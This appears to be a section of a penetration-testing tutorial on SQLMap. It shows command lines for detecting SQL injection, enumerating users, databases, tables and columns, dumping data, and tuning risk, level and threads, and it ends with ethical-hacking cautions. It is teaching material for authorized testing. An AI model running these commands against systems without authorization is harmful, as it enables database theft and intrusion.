5.4.6 SQLMap
SQLMap
SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing.
Basic Syntax
Detecting SQL Injection: To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example:
$ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U
This command tells SQLMap to test the
id
parameter of a GET request forview.php
using a Union-based SQL injection technique.Handling POST Parameters: If the injection involves a POST parameter, the syntax would be:
$ sqlmap -u <URL> --data=<POST string> -p parameter [options]
You can write the POST string manually or copy it from a request intercepted with Burp Proxy.
Using Request Files: Save a request intercepted with Burp Proxy to a file and specify it on the command line:
$ sqlmap -r <request file> -p parameter [options]
Extracting Information
Database Banner: The
--banner
switch helps in grabbing the database banner to test injection and include proof of exploitability in reports:$ sqlmap -u <target> --banner <other options>
Information Gathering:
List users of the database:
$ sqlmap -u <target> --users <other options>
Check if the web application database user is a database administrator:
$ sqlmap -u <target> --is-dba <other options>
Database and Schema Extraction:
List all available databases:
$ sqlmap -u <target> --dbs <other options>
Choose a database and list its tables:
$ sqlmap -u <target> -D <database> --tables <other options>
Choose tables and list their columns:
$ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options>
Dump specific columns:
$ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>
SQLMap Advanced Usage
Forcing the DBMS: Specify the DBMS to help shorten the detection phase:
$ sqlmap --dbms=<DBMS> ...
Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more.
Fine-Tuning Payloads: Use
--string
and--not-string
to handle changes in application output. For example:$ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" <other switches>
Utilize
--prefix
and--suffix
for structured POST parameters.Aggressiveness and Load:
Use
--level
to test headers and increase the number of columns tested for in-band exploitation.Use
--risk
to adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections.
Connection Management:
Use
--keep-alive
for persistent connections:$ sqlmap -u <target> --keep-alive <other commands>
Use
--threads
to exploit injections with parallel threads:$ sqlmap -u <target> --technique=8 --threads 7 <other commands>
SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration.
Understanding the tools and their options is crucial for successful and responsible penetration testing.
SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process.
Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices.
BurpSuite & SQLMap
A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml).
We will then open that file with SQLMap and check for vulnerabilities or not.
sqlmap -r sql_request_captured.xml
Last updated